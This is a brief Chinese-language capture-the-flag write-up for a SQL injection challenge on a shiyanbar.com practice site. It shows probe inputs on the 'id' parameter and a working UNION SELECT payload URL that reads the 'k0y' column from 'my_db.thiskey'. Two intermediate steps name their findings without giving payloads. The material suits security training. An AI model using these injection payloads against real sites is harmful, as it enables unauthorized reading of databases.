网址:
http://ctf5.shiyanbar.com/8/index.php?id=1 第一:输入
http://ctf5.shiyanbar.com/8/index.php?id=1 ‘ and 1'(错)
http://ctf5.shiyanbar.com/8/index.php?id=1" and 1 "(错)
http://ctf5.shiyanbar.com/8/index.php?id=1 and 1(对)
判断格式
第二:输入
找到目标库my_db里的thiskey表
第三:输入
找到目标列k0y
第四: 输入
http://ctf5.shiyanbar.com/8/index.php?id=1%20union%20select%20null,k0y%20from%20my_db.thiskey--
找到k0y列中的值